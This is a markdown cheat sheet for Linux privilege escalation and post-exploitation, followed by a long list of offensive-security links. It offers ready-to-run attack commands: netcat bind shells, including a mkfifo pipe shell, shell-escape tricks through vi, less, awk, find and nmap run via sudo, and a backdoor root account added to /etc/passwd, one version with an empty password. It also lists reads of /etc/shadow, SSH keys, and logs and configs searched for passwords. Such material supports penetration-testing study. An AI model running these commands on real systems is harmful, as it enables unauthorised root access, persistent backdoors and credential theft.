# privescalation


```bash 
  grep - grep ./ -r -A 3 -B 3 -aniPe "search-string" - also print neighbour lines
  grep ./ -r -aoiPe "search-string" - -o look up binary files too
  -i - ignore case

  find - find / -type d -name "*jdk*" -print (search for directory)
  find / -perm /6000 -user root -exec ls -ldb {} \; - search files, owned by root with suid OR guid bit and pass files to ls
  find is incredibly powerfull (can filter by time, permissions, users, regexp path, depth, …)

  netcat - nc -e /bin/bash -w 3 -nvlp 12344 + nc localhost 12344 - shell through modern netcat
  rm /tmp/q;mkfifo /tmp/q;cat /tmp/q|/bin/sh -i 2>&1|nc -l -p 12344 >/tmp/q + nc localhost 12344 - shell through netcat
  nc -zv example.com 1-1000 - scan ports
```
* Spawning a TTY shell (patching shell after exploit), this command will “upgrade your miserable os-commanding into regular semi-interactive shell”:

```bash 
python -c 'import pty; pty.spawn("/bin/bash")', /bin/bash -i, perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";, ruby: exec "/bin/sh", lua: os.execute('/bin/sh')
irb: exec "/bin/sh", vi: :!bash, vi: :set shell=/bin/bash:shell, nmap: !sh
Spawning a TTY Shell
Peleus
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl —e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within IRB)
exec "/bin/sh"
(From within vi)
:!bash
(From within vi)
:set shell=/bin/bash:shell
(From within nmap)
!sh
```

* Add user, by adding it into /etc/passwd:
  openssl passwd -1 -> $1$P31HlF1S$uIgLxnmiwjuC2.iaP8xvJ/ (password: test) (more and more, …) (generation with salt: openssl passwd -1 -salt my_salt my_pass)
  echo "username:$1$P31HlF1S$uIgLxnmiwjuC2.iaP8xvJ/:0:0:comment:/root:/bin/bash" >>/etc/passwd
  empty password: echo "u:$1$$qRPK7m23GJusamGpoGLby/:0:0::/:/bin/sh" >> /etc/passwd

  proxychains - echo "socks4 127.0.0.1 8080" >>/etc/proxychains.conf proxychains firefox
  alternative: tsocks - /etc/tsocks.conf
  proxifier - proxychains for windows
  iptables list rules: iptables -L -v -n --line-numbers # show all rules (-t tables: nat, filter, mangle, raw, security) (man iptables (ru) - великолепная статья про iptables)

  openssl
  connect: openssl s_client -connect ya.ru:443
  view certificate: openssl pkcs12 -info -in cert.p12

* Kernel, Operating System & Device Information:
# Command	Result
  uname -a	# Print all available system information
  uname -r	# Kernel release
  uname -n	# System hostname
  hostname	# As above
  uname -m	# Linux kernel architecture (32 or 64 bit)
  cat /proc/version	# Kernel information
  cat /etc/*-release	# Distribution information
  cat /etc/issue	# As above
  cat /proc/cpuinfo	# CPU information
  df -a	# File system information


* Users & Groups:
  # Command	Result
  cat /etc/passwd	# List all users on the system
  cat /etc/group	List all groups on the system
  for i in $(cat /etc/passwd 2>/dev/null| cut -d":" -f1 2>/dev/null);do id $i;done 2>/dev/null	# List all uid’s and respective group memberships
  cat /etc/shadow	# Show user hashes – Privileged command
  grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'	# List all super user accounts
  finger	# Users currently logged in
  pinky	# As above
  users	# As above
  who -a	# As above
  w	# Who is currently logged in and what they’re doing
  last	# Listing of last logged on users
  lastlog	# Information on when all users last logged in
  lastlog –u %username%	# Information on when the specified user last logged in
  lastlog |grep -v "Never"	# Entire list of previously logged on users


* User & Privilege Information:
  # Command	Result
  whoami	# Current username
  id	# Current user information
  cat /etc/sudoers	# Who’s allowed to do what as root – Privileged command
  sudo -l	# Can the current user perform anything as root
  sudo -l 2>/dev/null | grep -w 'nmap|perl|'awk'|'find'|'bash'|'sh'|'man'|'more'|'less'|'vi'|'vim'|'nc'|'netcat'|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null	# Can the current user run any ‘interesting’ binaries as root and if so also display the binary permissions etc.


* Environmental Information:
  # Command	Result
  env	# Display environmental variables
  set	# As above
  echo $PATH	# Path information
  history	# Displays command history of current user
  pwd	# Print working directory, i.e. ‘where am I’
  cat /etc/profile	# Display default system variables
  cat /etc/shells	# Display available shells


* Interesting Files:
  # Command	Result
  find / -perm -4000 -type f 2>/dev/null	# Find SUID files
  find / -uid 0 -perm -4000 -type f 2>/dev/null	# Find SUID files owned by root
  find / -perm -2000 -type f 2>/dev/null	# Find GUID files
  find / -perm -2 -type f 2>/dev/null	# Find world-writeable files
  find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null	# Find world-writeable files excluding those in /proc
  find / -perm -2 -type d 2>/dev/null	# Find word-writeable directories
  find /home –name *.rhosts -print 2>/dev/null	# Find rhost config files
  find /home -iname *.plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;	# Find *.plan files, list permissions and cat the file contents
  find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ;	# Find hosts.equiv, list permissions and cat the file contents
  ls -ahlR /root/	# See if you can access other user directories to find interesting files
  cat ~/.bash_history	# Show the current users’ command history
  ls -la ~/.*_history	# Show the current users’ various history files
  ls -la /root/.*_history	# Can we read root’s history files
  ls -la ~/.ssh/	# Check for interesting ssh files in the current users’ directory
  find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la
* Find SSH keys/host information
  ls -la /usr/sbin/in.*	Check Configuration of inetd services
  grep -l -i pass /var/log/*.log 2>/dev/null	# Check log files for keywords (‘pass’ in this example) and show positive matches
  find /var/log -type f -exec ls -la {} ; 2>/dev/null	# List files in specified directory (/var/log)
  find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null	List .log # files in specified directory (/var/log)
  find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} ; 2>/dev/null	# List .conf files in /etc (recursive 1 level)
  ls -la /etc/*.conf	# As above
  find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null

* Find .conf files (recursive 4 levels) and output line number where the word ‘password’ is located
  lsof -i -n	# List open files (output will depend on account privileges)
  head /var/mail/root	# Can we read roots mail


* Service Information:
  # Command	Result
  ps aux | grep root	# View services running as root
  ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'	# Lookup process binary path and permissions
  cat /etc/inetd.conf	# List services managed by inetd
  cat /etc/xinetd.conf	# As above for xinetd
  cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null
  # A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each
  ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null	# Permissions and contents of /etc/exports (NFS)


* Jobs/Tasks:
  Command	Result
  crontab -l -u %username%	# Display scheduled jobs for the specified user – Privileged command
  ls -la /etc/cron*	# Scheduled jobs overview (hourly, daily, monthly etc)
  ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null	# What can ‘others’ write in /etc/cron* directories
  top	# List of current tasks


* Networking, Routing & Communications:
  # Command	Result
  /sbin/ifconfig -a	# List all network interfaces
  cat /etc/network/interfaces	# As above
  arp -a	# Display ARP communications
  route	# Display route information
  cat /etc/resolv.conf	# Show configured DNS sever addresses
  netstat -antp	# List all TCP sockets and related PIDs (-p Privileged command)
  netstat -anup	# List all UDP sockets and related PIDs (-p Privileged command)
  iptables -L	# List rules – Privileged command
  cat /etc/services	# View port numbers/services mappings


* Programs Installed:
  # Command	Result
  dpkg -l	# Installed packages (Debian)
  rpm -qa	# Installed packages (Red Hat)
  sudo -V	# Sudo version – does an exploit exist?
  httpd -v	# Apache version
  apache2 -v	# As above
  apache2ctl (or apachectl) -M	# List loaded Apache modules
  mysql --version	# Installed MYSQL version details
  psql -V	# Installed Postgres version details
  perl -v	# Installed Perl version details
  java -version	# Installed Java version details
  python --version	# Installed Python version details
  ruby -v	# Installed Ruby version details
  find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc)	# Locate ‘useful’ programs (netcat, wget etc)
  which %program_name% (i.e. nc, netcat, wget, nmap etc)	# As above
  dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null	# List available compilers
  cat /etc/apache2/envvars 2>/dev/null |grep -i 'user|group' |awk '{sub(/.*export /,"")}1'	# Which account is Apache running as


* Common Shell Escape Sequences:

  | Command                                                   | Program(s)      |
  |-----------------------------------------------------------+-----------------|
  | :!bash                                                    | vi, vim         |
  | :set shell=/bin/bash:shell                                | vi, vim         |
  | !bash                                                     | man, more, less |
  | find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; | find            |
  | awk 'BEGIN {system("/bin/bash")}'                         | awk             |
  | echo "os.execute('/bin/sh')" > exploit.nse                | nmap            |
  | sudo nmap --script=exploit.nse                            | nmap            |
  | perl -e 'exec "/bin/bash";'                               | Perl            |


* =resources=
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
- http://www.securitysift.com/download/linuxprivchecker.py
- https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
- https://github.com/pentestmonkey/unix-privesc-check
- https://github.com/liamg/traitor
- https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
- https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
- https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
- https://raw.githubusercontent.com/PenturaLabs/Linux_Exploit_Suggester/master/Linux_Exploit_Suggester.pl
- https://www.rebootuser.com/?p=1758
- https://gtfobins.github.io/
- http://pwnwiki.io/#!index.md
- https://github.com/DominicBreuker/pspy
- https://github.com/jm33-m0/emp3r0r
- http://oxhat.blogspot.com/2017/06/linux-privilege-escalation-suid-binaries.html
- https://touhidshaikh.com/blog/?p=790
- https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- http://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
- https://github.com/carlospolop/PEASS-ng
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite
- https://github.com/OlivierLaflamme/Cheatsheet-God/blob/master/Cheatsheet_LinuxPentest.txt
- https://www.networkworld.com/article/2875972/clamping-down-on-users-with-rbash.html
- https://github.com/Escapingbug/awesome-browser-exploit
- https://www.pentestpartners.com/security-blog/exploiting-suid-executables/
- http://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
- http://www.fuzzysecurity.com/tutorials/16.html
- https://github.com/GDSSecurity/Windows-Exploit-Suggester
- https://github.com/mubix/post-exploitation
- https://github.com/TheSecondSun/Bashark
- http://etutorials.org/Networking/network+security+hacks/Chapter+1.+Unix+Host+Security/Hack+18+Restricted+Shell+Environments/
- http://hackingandsecurity.blogspot.com/
- https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md
- https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md#linpriv
- https://github.com/mubix/post-exploitation/wiki/Linux-Post-Exploitation-Command-List
- https://hackmag.com/security/linux-killchain/
- http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
- http://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
- https://www.rebootuser.com/?p=1623
- https://blog.m0noc.com/
- http://www.microhowto.info/howto/copy_a_file_from_one_machine_to_another_using_netcat.html
- https://github.com/nairuzabulhul/HackTheBox
- https://github.com/oddcod3/Phantom-Evasion
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/
- https://github.com/xiaoxiaoleo/pentest-script/blob/master/PrivilegeEscalation/Linux/ps_history.sh
- http://attackerkb.com/Powershell/Powershell_Empire
- https://d00mfist1.gitbooks.io/ctf/content/privilege_escalation_-_linux.html
- https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html
- https://feelsec.info/2019/01/29/privilege-escalation-linux/
- https://pentestlab.blog/category/privilege-escalation/
- https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
- https://github.com/DominicBreuker/pspy/blob/master/README.md
- https://github.com/rebootuser/LinEnum
- https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
- https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3
- http://linuxshellaccount.blogspot.com/2008/05/restricted-accounts-and-vim-tricks-in.html
- https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
- https://phonexicum.github.io/infosec/windows.html
- https://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194
- https://pberba.github.io/security/
- https://noby0x1.medium.com/linux-privilege-escalation-524295de919a
- https://adityatelange.in/blog/revshells/
